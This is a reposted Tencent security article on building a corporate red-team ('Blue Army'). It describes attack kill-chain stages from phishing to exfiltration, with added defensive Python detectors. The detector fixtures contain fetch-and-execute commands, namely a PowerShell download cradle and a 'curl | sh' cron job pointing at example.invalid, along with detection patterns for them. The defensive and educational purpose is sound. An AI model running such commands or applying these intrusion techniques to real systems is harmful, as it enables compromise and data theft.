Hacking Book | Free Online Hacking Learning


Promoting Defense Through Attack: Thoughts on Building an Enterprise Blue Army

Posted by harmelink at 2020-02-27

Author: [TSRC & Tencent Blue Army] mark4z5 (junior 5)

In April 2017 the hacker group Shadow Brokers released part of the NSA's arsenal of cyber weapons. Backed by a nation state, the NSA has a strong ability to discover and exploit universal 0-day vulnerabilities, and the exploits for those vulnerabilities are the nuclear weapons of the arsenal; among them was the exploitation tool for the Windows EternalBlue vulnerability. The leak put these weapons into criminal hands, where they were used to spread ransomware worms. Remember the rampage of WannaCry? Millions of computers around the world, including those of large enterprises and government agencies, were attacked, which shows how powerful such tools are.

This is just one of the countless attacks.

While people enjoy the convenience that network technology brings, they seldom notice the sword of Damocles hanging over their heads: security. Vulnerabilities keep appearing and keep growing more diverse. No protective measure defeats the enemy once and for all; any carelessness may hand hackers an opportunity.

At the level of a single enterprise, however, security incidents are relatively infrequent and are rarely perceived directly by the business. When no incident has occurred, or an attack has caused no direct loss, it is easy to fall under the illusion that protection is adequate and business data is safe; protection measures then fall behind, security processes grow stale, and staff awareness slackens.

When the sword really falls, it will be too late.

This also explains why, as global security incidents have become frequent in recent years, governments at home and abroad attach great importance to cyber security. As the state has put it, there is no national security without network security. Network security and informatization are strategic issues tied to national security and development and to the work and lives of the people, and they are the key to turning China from a large network country into a strong one.

But not every vulnerability can be found by automated tools, so national cyber security exercises are in full swing both at home and abroad. China's Ministry of Public Security organizes network protection actions that gather the country's best penetration test engineers for risk-controlled attack drills, and the U.S. Department of Homeland Security runs the Cyber Storm cyber security exercise every two years.

Going from large to strong requires practice. Exercises are the touchstone and the fuel of network security construction, and the place where an enterprise's protection level is put to the test. Only by continuously exposing and fixing defects in protection, monitoring and emergency response can we withstand the fierce attacks of hackers.

So the question is: who will lead the way on this "trial road"?

For Tencent, a company of enormous scale with diverse businesses and massive data assets, what is needed is an internal attack team that understands the company's business and continuously penetrates the company's assets from the hacker's perspective. Only then can Tencent become aware of its various security risks more easily and eliminate them before they take root.

Thus the Tencent Blue Army came into being.

The concept of a blue army has long existed in the military.

In China, the blue army plays the role of the imaginary enemy (the opposing force) and holds live exercises against the Red Army (our own forces) to help the Red Army find and remedy its shortcomings and improve its combat capability. The concept of red-blue confrontation in network security derives from this: an APT (advanced persistent threat) attack drill comprehensively tests an enterprise's security robustness and its threat monitoring and response capability.

The Red Army, as the enterprise's defending side, keeps the enterprise safe through security hardening, attack monitoring, emergency response and other means, while the Blue Army, as the attacking side, aims to find security vulnerabilities and obtain business privileges or data, trying by every means to bypass the Red Army's layers of defense and reach the set objective. Note that in Europe and the United States the colors are reversed: the red team is the attacker and the blue team the defender, which is a frequent source of confusion.

The work of an enterprise network Blue Army consists mainly of penetration testing and red teaming. The attack techniques used are very similar; the main difference lies in the focus. Penetration testing concentrates on finding as many security vulnerabilities as possible in a short time. It generally pays little attention to whether the attack is detected by monitoring, and even when detected it is not blocked immediately; the purpose is to help business systems expose and close as many risks as possible. Red-blue confrontation, by contrast, is usually conducted back-to-back, approximating a real attack: it focuses on bypassing the defense system and obtaining business privileges or data without making a sound, not on finding every risk point, because every additional attack action raises the probability of being discovered, and once discovered the Red Army kicks the Blue Army off the battlefield. This tests defense in depth, the quality of alarm operations and emergency response capability under real attack conditions; of course, vulnerabilities in business systems are found along the way.

The Tencent Blue Army was established in 2006 by the Security Platform Department of Tencent TEG. At that time automated vulnerability detection was relatively weak, and more vulnerabilities had to be found by hand. In that context the Tencent Blue Army was officially formed, and it has made its mark ever since. For more than ten years it has focused on research into cutting-edge attack and defense technology, live exercises, penetration testing, security assessment, and training and enablement, using the attacker's perspective to run live exercises in the real network environment, test the adequacy and effectiveness of protection strategies and response mechanisms, and drive optimization and improvement.

So when we talk about the Blue Army, we are not talking about a simple imitation of hackers, but about thorough planning, careful reconnaissance, meticulous design and targeted defense recommendations.

To understand the Blue Army's full attack life cycle, we can follow the cyber attack kill chain: first obtain a foothold by some means, then expand control through privilege escalation, information discovery and lateral movement, and finally collect, steal or tamper with data.

Below is a brief analysis of the Blue Army's attack techniques at each stage, based on Tencent Blue Army's more than ten years of attack and defense practice:

Target reconnaissance: use a range of reconnaissance means to obtain information about the target's assets, personnel, environment and so on, providing the basic information support for the attack. The comprehensiveness and accuracy of this information largely determine the attack path, its result and its efficiency. For example: obtain domain name assets through DNS zone transfer vulnerabilities, reverse lookup of domain registration information, domain name enumeration and other means; obtain IP assets through domain name resolution, network segment scanning and other means; obtain program fingerprints through website scanning, port probing and other means; obtain organizational structure, employee information, source code, account passwords, commonly used software, frequently visited websites, security protection strategies, outsourcing service providers and similar information through search engines, social networking sites, online drives, GitHub and other platforms, and through social engineering; and obtain environmental information about the workplace and computer room, such as the network, access control and offices, through on-site reconnaissance.

Weapon construction: build targeted attack code from the information collected earlier. If we intend to attack HR, we can craft resume documents implanted with a Trojan; if we plan to start from online services, we can probe the target assets for vulnerabilities through automated scanning, manual testing and other means to find an exploitable 0-day. In the APT cases made public so far, at least 80% start by attacking employees' office computers, because people are the biggest vulnerability in any system, social engineering has a high success rate, and a compromised employee computer makes it easier to find the way into the internal network and expand the scope of control.

Attack delivery: deliver the attack payload to the target by various means. For example, directly attack online services through command injection, file upload, SQL injection, SSRF, XSS, overflow and similar vulnerabilities; or intrude into servers, employee computers and network equipment through mail phishing, USB-drive ferrying attacks, watering hole attacks, software and hardware supply chain attacks, network hijacking and other methods.
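As an added defensive example for the two stages above (not code from the post or from Tencent's tooling): a mail-gateway check that judges a "resume" attachment by its content rather than by its name. It builds constructed OOXML packages and archives in memory, then flags a VBA project inside a document, an executable under a document extension, and executable members inside an archive. The member name word/vbaProject.bin and the extension lists are assumptions of this example, not a Tencent ruleset.

```python
import io
import re
import zipfile

# Member names and extensions treated as active content. These lists are
# assumptions for this example, not a production ruleset.
MACRO_MEMBER = re.compile(r"^(word|xl|ppt)/vbaProject\.bin$", re.IGNORECASE)
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".js", ".jse", ".vbs", ".vbe", ".hta", ".lnk", ".ps1")
DOC_EXT = (".docx", ".xlsx", ".pptx", ".doc", ".xls", ".ppt", ".pdf")
MACRO_FREE_EXT = (".docx", ".xlsx", ".pptx")


def make_ooxml(with_macro: bool) -> bytes:
    """Build a minimal OOXML package in memory (constructed sample, not a real resume)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Macro-enabled Word documents carry the VBA project at this path.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed macro container")
    return buf.getvalue()


def make_zip(members: dict) -> bytes:
    """Build an archive from {member name: bytes} (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def inspect_attachment(filename: str, data: bytes) -> list:
    """Return findings for one attachment, judged by content rather than by filename."""
    findings = []
    lower = filename.lower()

    # 1. A PE header means an executable, whatever the name claims.
    if data[:2] == b"MZ":
        findings.append("PE executable")
        if lower.endswith(DOC_EXT):
            findings.append("executable disguised with document extension")
        return findings

    # 2. OOXML documents and archives are both ZIP containers: look inside.
    if data[:4] == b"PK\x03\x04":
        try:
            names = zipfile.ZipFile(io.BytesIO(data)).namelist()
        except zipfile.BadZipFile:
            return ["corrupt zip container"]
        if any(MACRO_MEMBER.match(n) for n in names):
            findings.append("document contains VBA macro project")
            if lower.endswith(MACRO_FREE_EXT):
                # .docx must not carry a VBA project (.docm would); the mismatch is a strong signal.
                findings.append("macro project under macro-free extension")
        for n in names:
            if n.lower().endswith(EXEC_EXT):
                findings.append(f"archive member is executable: {n}")
    return findings


def triage(attachments: dict) -> dict:
    """Map attachment name -> 'quarantine' or 'deliver' for a batch of attachments."""
    return {name: ("quarantine" if inspect_attachment(name, data) else "deliver")
            for name, data in attachments.items()}


if __name__ == "__main__":
    samples = {  # constructed attachments
        "resume_clean.docx": make_ooxml(with_macro=False),
        "resume_macro.docx": make_ooxml(with_macro=True),
        "resume.pdf": b"MZ\x90\x00" + b"\x00" * 60,          # PE bytes under a .pdf name
        "resume_pack.zip": make_zip({"resume.docx.scr": b"MZ"}),
    }
    for name, verdict in triage(samples).items():
        print(f"{name:20s} {verdict:10s} {inspect_attachment(name, samples[name])}")
```

The check deliberately ignores the extension when deciding what a file is: the extension is only consulted afterwards, to detect a mismatch between what the sender claims and what the bytes contain.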

Execution: different execution methods are used in different environments. In a restricted environment, malicious code can be loaded through system components or legitimate programs, breaking through system restrictions or hiding itself so that the Trojan runs smoothly. For example, in a Windows environment the built-in PowerShell is used to execute scripts: the malicious code exists only in memory and no file touches disk. There are many similar execution methods.

Command and control: establish channels of varying concealment to control the target device or enter the target intranet. For example, webshells (e.g. Caidao, Weevely), reverse shells (e.g. bash / Python / PowerShell), remote access Trojans (e.g. Cobalt Strike / Metasploit Meterpreter), remote desktop software (e.g. TeamViewer / VNC), multi-layer proxies, transport encryption, port reuse, domain fronting and other methods are used over TCP / UDP / HTTP / HTTPS / DNS / ICMP / SMTP and other network protocols, even imitating the traffic of other normal applications, to achieve real-time monitoring and remote control of the target device; port forwarding (such as netsh / iptables), SOCKS proxies (such as ssh -D), HTTP tunnels (such as reGeorg), enterprise VPN channels and other methods are used to penetrate the enterprise intranet and break through the network boundary.

Defense evasion: use anti-detection techniques, clearing of attack traces and other methods to evade discovery and tracing by intrusion detection, anti-virus and other security systems. For example, launching attacks from compromised hosts ("broilers") so that the hacker's real IP address is never exposed, constructing malformed request packets to bypass the WAF, injecting malicious code into normal legitimate processes or files, using whitelisting, anti-debugging, fileless techniques and similar means to bypass virus detection (such as signing malicious programs with legitimate digital certificates of well-known companies), clearing or destroying application access and system login logs, and reducing the frequency of activity.
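Added example, not from the post: detection logic for the execution and evasion techniques described in the two stages above, run over constructed Windows event records. It parses 4688 process-creation events for PowerShell launched with an encoded command, a hidden window or an execution-policy bypass (decoding the UTF-16LE base64 payload for the analyst), looks for download-and-execute cradles in 4104 script block logs, and treats 1102 (audit log cleared) as a trace-clearing signal. Field names follow the Windows event XML; the rule wording, the Office parent list and the sample events are this example's assumptions.

```python
import base64
import re
import shlex

# Assumed event fields (Windows Security / PowerShell event XML): EventID, NewProcessName,
# ParentProcessName, CommandLine, ScriptBlockText, SubjectUserName.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CRADLE = re.compile(r"(?i)\b(IEX|Invoke-Expression|DownloadString|DownloadFile|FromBase64String|Net\.WebClient)\b")


def basename(path: str) -> str:
    """Last path component, tolerant of Windows separators on any host."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ps_flags(cmdline: str):
    """Parse a PowerShell command line. PowerShell accepts any unambiguous prefix of a
    parameter name (-enc, -e, -w ...), so switches are matched by prefix, not exact spelling."""
    try:
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        argv = cmdline.split()
    flags, payload = set(), None
    for i, arg in enumerate(argv):
        if arg[:1] not in ("-", "/"):
            continue
        name = arg.lstrip("-/").lower()
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if name and "encodedcommand".startswith(name):
            flags.add("encoded")
            payload = nxt
        elif name and "windowstyle".startswith(name) and nxt.lower().startswith("h"):
            flags.add("hidden")
        elif name and "executionpolicy".startswith(name) and nxt.lower() in ("bypass", "unrestricted"):
            flags.add("bypass")
    return flags, payload


def decode_encoded_command(payload: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return the text or None."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_sample(text: str) -> str:
    """Build an -EncodedCommand argument for a constructed sample event."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def triage_event(ev: dict) -> list:
    findings = []
    eid = ev.get("EventID")
    if eid == 4688 and basename(ev.get("NewProcessName", "")) in ("powershell.exe", "pwsh.exe"):
        flags, payload = ps_flags(ev.get("CommandLine", ""))
        if "encoded" in flags:
            findings.append("encoded PowerShell command")
            decoded = decode_encoded_command(payload or "")
            if decoded and CRADLE.search(decoded):
                findings.append("download/exec cradle inside encoded command")
        stealth = sorted(flags & {"hidden", "bypass"})
        if stealth:
            findings.append("stealth launch flags: " + ",".join(stealth))
        if basename(ev.get("ParentProcessName", "")) in OFFICE_APPS:
            findings.append("PowerShell spawned by Office application")
    elif eid == 4104 and CRADLE.search(ev.get("ScriptBlockText", "")):
        findings.append("download/exec cradle in script block")
    elif eid == 1102:
        findings.append("security audit log cleared by " + ev.get("SubjectUserName", "?"))
    return findings


def triage(events: list) -> list:
    """One findings list per event, in input order."""
    return [triage_event(ev) for ev in events]


SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_sample(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')")},
    {"EventID": 4104,
     "ScriptBlockText": "$s = (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1'); IEX $s"},
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\ops\backup.ps1"},
    {"EventID": 1102, "SubjectUserName": "svc-backup"},
]

if __name__ == "__main__":
    for ev, findings in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(ev["EventID"], findings)
```

Script block logging (4104) is what makes the in-memory case visible at all: the decoded script text is written to the log even when nothing is written to disk, so a fileless launch still leaves a record to match against.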

Persistence: achieve long-term control that survives a reboot or reinstall by hijacking legitimate programs, planting a backdoor that starts with the system, creating a hidden administrator account, and so on. For example, replacing system accessibility features (such as the magnifier or on-screen keyboard), hijacking dynamic link libraries, starting with the system through a Windows service or startup item or a Linux crontab entry, setting a SUID privileged program, installing a bootkit Trojan, stealing the original legitimate account password, and so on.

Privilege escalation: exploit system weaknesses or misconfigurations to obtain super-administrator privileges. For example, exploiting the latest Windows / Linux kernel privilege escalation vulnerabilities, exploiting third-party software that runs with administrator privileges, tampering with program files that are executed regularly with administrator privileges but, through improper permission settings, can be modified by ordinary users, and finding administrator passwords carelessly stored in ordinary files on servers.
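Added example covering the persistence and privilege escalation stages above (this is not Tencent's code): an audit of an /etc/crontab-style table that flags root jobs whose script is owned by a non-root user or writable by group/other, jobs that run from world-writable temp directories, jobs whose target no longer exists, and jobs that pipe downloaded content into a shell. The crontab and the file inventory are constructed; the ownership lookup is injected so the same logic runs against the real filesystem through fs_lookup.

```python
import os
import re
import stat

CRON_FIELDS = 5
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Remote fetch piped into a shell, and interpreters whose first argument is the real script.
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
INTERPRETERS = {"sh", "bash", "python", "python3", "perl"}


def parse_system_crontab(text: str):
    """Yield (user, command) for each job line of a system crontab (with user field)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comment or environment assignment such as PATH=...
        if line.startswith("@"):
            parts, needed = line.split(None, 2), 3            # @reboot user command
        else:
            parts, needed = line.split(None, CRON_FIELDS + 1), CRON_FIELDS + 2
        if len(parts) < needed:
            continue
        yield parts[-2], parts[-1]


def script_path(command: str):
    """The file that actually runs: the first token, or the interpreter's first non-option."""
    tokens = command.split()
    if not tokens:
        return None
    if os.path.basename(tokens[0]) in INTERPRETERS:
        return next((t for t in tokens[1:] if not t.startswith("-")), None)
    return tokens[0]


def fs_lookup(path: str):
    """Real-filesystem lookup: (uid, st_mode) or None if the path does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, st.st_mode


def audit_crontab(text: str, lookup) -> list:
    """Return (user, command, reason) tuples; lookup(path) -> (uid, mode) or None."""
    findings = []
    for user, command in parse_system_crontab(text):
        if FETCH_TO_SHELL.search(command):
            findings.append((user, command, "fetches remote content into a shell"))
        path = script_path(command)
        if path is None or not os.path.isabs(path):
            continue
        if path.startswith(SUSPECT_DIRS):
            findings.append((user, command, "job runs from a world-writable temp directory"))
        info = lookup(path)
        if info is None:
            findings.append((user, command, "job target does not exist"))
            continue
        uid, mode = info
        if user == "root":
            if uid != 0:
                findings.append((user, command, "root job owned by uid %d" % uid))
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((user, command,
                                 "root job writable by group/other (mode %o)" % stat.S_IMODE(mode)))
    return findings


SAMPLE_CRONTAB = """\
# /etc/crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
17 *    * * *   root    /opt/backup/rotate.sh >/dev/null 2>&1
*/5 *   * * *   root    /usr/bin/python3 /opt/monitor/collect.py
@reboot         root    /tmp/.cache/update.sh
0 3     * * *   deploy  /home/deploy/deploy.sh
*/10 *  * * *   root    curl -s http://example.invalid/a | sh
"""
SAMPLE_FILES = {  # constructed inventory: path -> (uid, st_mode)
    "/opt/backup/rotate.sh": (0, 0o100755),
    "/opt/monitor/collect.py": (1001, 0o100664),   # non-root owner, group-writable
    "/home/deploy/deploy.sh": (1001, 0o100775),
}

if __name__ == "__main__":
    for user, command, reason in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FILES.get):
        print(f"[{user}] {command!r}: {reason}")
```

Against a live host, call audit_crontab(open("/etc/crontab").read(), fs_lookup); the same checks apply to the files under /etc/cron.d. The collect.py case is the privilege escalation scenario from the text exactly: a root job whose script an ordinary user can edit.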

Information discovery: confirm what data can be acquired or controlled through local searching, intranet scanning and sniffing, and further understand the internal network and possible risk points. For example, rummaging through the local host for the user list, process list, network connections, configuration files, program code, database contents, operation and maintenance records, system account passwords, passwords saved by browsers, mail contents and other information; obtaining user credentials through memory dumping, keystroke logging and network sniffing; analyzing the enterprise's complete organization and personnel and its important machines by querying all accounts and hosts in the Windows domain; mapping the intranet topology, intranet application services and possible risk points through host liveness detection and remote service detection; and obtaining business architecture, code, server and other information by visiting internal OA websites, especially knowledge sharing platforms.

Lateral movement: obtain more server privileges and data through intranet penetration. Generally speaking, hackers prefer to attack systems that hold management authority over the enterprise's network, machines and data, such as the Windows domain controller, patch server, mail system, internal instant messaging tool, jump host, operation and maintenance platform, password system and code management platform. The reason is simple: once these systems are broken, almost every machine can be controlled and the target business data obtained. Hackers also like to attack the computers of executives, employees of the targeted business and network administrators, because the information they hold is more important and closer to the hacker's goal. One common intranet penetration approach exploits the fact that most enterprises have insufficiently fine-grained internal isolation (large enterprises in particular have too many servers and high isolation costs), weak security on internal sites (investment goes to external attack prevention, with little for internal system security), and no authentication on high-risk internal application services (such as Docker / Kubernetes / Redis / Hadoop), which can then be taken over directly; many people assume the intranet is secure, so authentication is left off. Server account passwords are also commonly shared (for convenience of management, sometimes every server uses the same password). These conditions make it easy for hackers, once inside the intranet, to gain control of a few servers, log in to them one by one and harvest users' login credentials (one server has multiple accounts), then use those credentials to try to log in to other servers; each successful login yields more users' credentials, which may in turn open further servers.

By repeatedly trying to log in and harvesting credentials in this classic way, the attacker gradually expands the scope of server control and may finally be able to log in to any server with legitimate user credentials, just as an operations administrator logs in for routine maintenance.
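Added example (not from the post): a detector for the credential-harvesting pivot described above, run over constructed sshd syslog lines collected from several hosts. A single source address that completes successful logins to several different hosts under several different accounts inside a short window is the signature; logins originating from a server rather than a workstation are marked as well, since an administrator normally works from a jump host or workstation. The syslog format, the assumed year 2020, the server list and the thresholds are assumptions of the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Standard sshd "Accepted" line as forwarded by syslog (host field after the timestamp).
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)
YEAR = 2020  # syslog lines carry no year; assumed for the constructed sample


def parse(lines):
    """Return successful logins as (timestamp, host, user, src, method), sorted by time."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(f"{YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["host"], m["user"], m["src"], m["method"]))
    return sorted(events)


def detect_pivots(events, server_ips, window=timedelta(minutes=10), min_hosts=3, min_users=2):
    """Flag a source that reaches >= min_hosts distinct hosts with >= min_users distinct
    accounts inside one window. A monitoring account touching many hosts under ONE user
    stays below min_users; an admin using one account on two hosts stays below min_hosts."""
    alerts = []
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[3]].append(ev)
    for src, evs in by_src.items():
        for i, (start, *_rest) in enumerate(evs):
            inwin = [e for e in evs[i:] if e[0] - start <= window]
            hosts = {e[1] for e in inwin}
            users = {e[2] for e in inwin}
            if len(hosts) >= min_hosts and len(users) >= min_users:
                alerts.append({"src": src, "start": start, "hosts": sorted(hosts),
                               "users": sorted(users), "server_origin": src in server_ips})
                break  # one alert per source is enough for triage
    return alerts


SERVER_IPS = {"10.0.0.5", "10.0.0.9"}  # constructed: addresses known to be servers
SAMPLE_LOG = [  # constructed lines, not real logs
    "Mar 10 09:00:01 web01 sshd[2101]: Accepted publickey for alice from 10.10.1.23 port 50122 ssh2",
    "Mar 10 09:01:15 web02 sshd[1877]: Accepted publickey for alice from 10.10.1.23 port 50140 ssh2",
    "Mar 10 09:05:00 db01 sshd[3310]: Accepted password for deploy from 10.0.0.5 port 41000 ssh2",
    "Mar 10 09:07:42 app01 sshd[990]: Accepted password for root from 10.0.0.5 port 41012 ssh2",
    "Mar 10 09:09:10 app02 sshd[1411]: Accepted password for deploy from 10.0.0.5 port 41030 ssh2",
    "Mar 10 09:12:55 ops01 sshd[2220]: Accepted password for opsadmin from 10.0.0.5 port 41044 ssh2",
    "Mar 10 09:20:00 web03 sshd[1500]: Failed password for root from 10.0.0.5 port 41050 ssh2",
    "Mar 10 09:30:00 app01 sshd[1001]: Accepted publickey for nagios from 10.0.0.9 port 33000 ssh2",
    "Mar 10 09:30:02 app02 sshd[1420]: Accepted publickey for nagios from 10.0.0.9 port 33001 ssh2",
    "Mar 10 09:30:04 db01 sshd[3320]: Accepted publickey for nagios from 10.0.0.9 port 33002 ssh2",
]


def analyze(lines=SAMPLE_LOG, server_ips=SERVER_IPS):
    return detect_pivots(parse(lines), server_ips)


if __name__ == "__main__":
    for alert in analyze():
        print(alert)
```

The two benign patterns in the sample (one administrator on two hosts, one monitoring account on three hosts) show why both thresholds are needed; the 10.0.0.5 chain trips both, and its server origin is the detail that turns an anomaly into a pivot.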

Data collection: gather target data such as source code, databases, asset information, technical schemes, trade secrets, email contents and so on.

Data exfiltration: encrypt, compress and segment the data, then transmit it to the hackers over HTTP(S) / FTP / DNS / SMTP and other network protocols, publish it through a web server for external access and download, copy it physically to a USB drive, or read it out directly through a business interface.

Tampering and destruction: profit illegally by modifying data, take revenge by destroying data, and so on.

There are many specific attack methods, and not every attack involves every stage. For example, if the purpose is to obtain a system's data and the system itself has a SQL injection vulnerability, the data can be pulled directly from the external network through that vulnerability, without any of the more complex techniques. Hackers choose the best means for their purpose and circumstances rather than attacking blindly.

The same is true of security exercises, which are conducted according to the exercise's demands and purpose. The MITRE ATT&CK matrix is a knowledge base of attack tactics, techniques and procedures compiled from real intrusions by APT groups worldwide, and it is of great reference value. Some of its procedure examples, however, are not detailed enough; we have refined and extended them and will continue to share them in the future.

The ancients said that what is learned from paper is always shallow; to truly know a thing one must do it. The above describes the cyber attack kill chain in detail. The Tencent Blue Army's more than ten years have been a journey from theory to practice, from paper to the field.

Since its formation in 2006, we have conducted penetration tests on QQ, QQ Space, WeChat, payment, mini programs, Tencent Cloud, games and other important businesses, and found and eliminated a large number of potential security risks. Last year the company vigorously promoted moving in-house business to the cloud, and the Security Platform Department provided a complete set of security solutions and services for it, including security specifications, security protection, security assessment, security intelligence and security detection. The Blue Army kept pace with this development, focusing on penetration testing of multiple Tencent Cloud basic components to improve the overall security of Tencent Cloud.

In 2008 Tencent's independently developed server security system (code name "Onion") was officially launched, and the Blue Army began APT red-blue confrontation drills, which are now held dozens of times a year to continuously improve detection capability. These drills take two forms. One is reverse verification of strategy scenarios, which tests the coverage and effectiveness of detection strategies: the Blue Army catalogs attack scenarios as comprehensively as possible, including techniques already published on the Internet and techniques it has researched itself, runs batch drills in the test environment from time to time, and runs surprise drills in the production environment. The other is a complete attack drill aimed at obtaining control of servers or data, which tests in-depth detection capability, alarm operation quality, emergency response capability and the business's security posture under real attack. The external network protection of important businesses is usually strong and hard to attack directly, so businesses with less security investment and people with weak security awareness become the hacker's breakthrough: first break into the internal network, then penetrate it, and attack the important business indirectly. The Blue Army has infiltrated important businesses and infrastructure many times in this way to help improve the intranet's protection and attack detection capabilities. Business spies and insiders naturally hold some legitimate privileges and, after lying low for a long time, may learn some of the detection strategies; the Blue Army also plays these roles to help the company strengthen its monitoring and auditing capabilities.

In 2015 the Blue Army and the DDoS protection team ("Aegis") jointly and comprehensively reviewed the scenarios covered by the DDoS protection algorithms, conducted multiple DDoS attack exercises and tests against Aegis, and found a number of defects in the protection algorithms. Targeted coordination and optimization based on business scenarios and industry developments followed, and Aegis's service quality improved significantly.

In 2016 the Blue Army moved into risk control security, launched many red-blue confrontations against Tencent's front-end risk control, provided many optimization suggestions and directions, and helped improve and build front-end-based risk control capability (see Tencent Waterproof Wall).

In 2018 the Blue Army formally began enabling outside organizations. At the request of Digital Guangdong and Tencent Cloud, the Blue Army conducted a red-blue confrontation exercise against Digital Guangdong, launching attacks through remote penetration of Internet sites, phishing emails to employees and physical attacks on arrival at the office, finding multiple security risks and helping Digital Guangdong improve its security hardening and protection capabilities. At the same time, in last year's Guiyang big data and network security attack and defense drill organized by the Ministry of Public Security, the blue army joint team formed by Digital Guangdong Security, Tencent Cloud Security, Cohen, Tencent IT and Anping scored highest in attack and defense on the strength of their offensive and defensive abilities; the target they defended was never breached through the end of the drill, the only red-side target not broken, and the team won the first prize for technological innovation.

After years of intense red-blue confrontation exercises, red and blue have chased and spurred each other on, and the company's security protection system has improved greatly. The technical capabilities of the company's security systems, including the server security system ("Onion"), DDoS protection system ("Aegis"), web application firewall ("Doorman") and web vulnerability detection system ("Dongxi"), have risen considerably. Under Tencent's industrial Internet strategy, these systems are also consolidating more than ten years of security accumulation and outputting it to third-party users: for example, the Dayu DDoS protection product built jointly with the Tencent Cloud security team, the insight product that escorts "A Mobile Phone Traveling in Yunnan", and the Tencent Cloud red-blue confrontation expert service; "Onion", whose detection covers every link of the cyber attack kill chain, has also launched a product version.

In addition, the Tencent Security Emergency Response Center (TSRC), established in 2012, draws on external security researchers and intelligence contributors to work with us, on the premise of safety and reliability, to find potential security risks and protection defects in Tencent's external-facing business. Tens of thousands of people at home and abroad have participated so far, which can be regarded as an extension of the Tencent Blue Army; we sincerely thank them for their help.

We warmly welcome penetration testing and red-blue confrontation experts to send us their resumes and join us, or to become Tencent security white hats and guard the security of hundreds of millions of users together with us.

The essence of network security is confrontation, and the essence of confrontation is a contest between the capabilities of attack and defense, but attack and defense are never equal: the attacker's advantage is far greater than the defender's. The Blue Army exists to help eliminate that inequality. First, compared with national APT organizations, an enterprise network blue army has far fewer human, material and financial resources, so continuously and promptly mastering the latest APT attack techniques is very challenging. Second, there are many attack scenarios and strong demand from the business, so many drills must be run, and completing this mission efficiently with limited manpower is also a challenge.

We believe that in the future more enterprises will build network blue armies, invest more resources in researching cutting-edge APT attack techniques, and build more intelligent automated attack platforms for blue armies to improve exercise efficiency. We will also share the technical experience and attack and defense thinking from our live exercises as soon as we can. Please follow the official website of the Tencent Blue Army at https://force.tencent.com/.

We are TSRC

The guardian of Internet Security

The protector of user data security

We look for vulnerabilities, intrusions and attacks

Joining hands with the elite of the security industry to build a secure Internet ecosystem

We look forward to your positive energy as you join us!

WeChat ID: TSRC team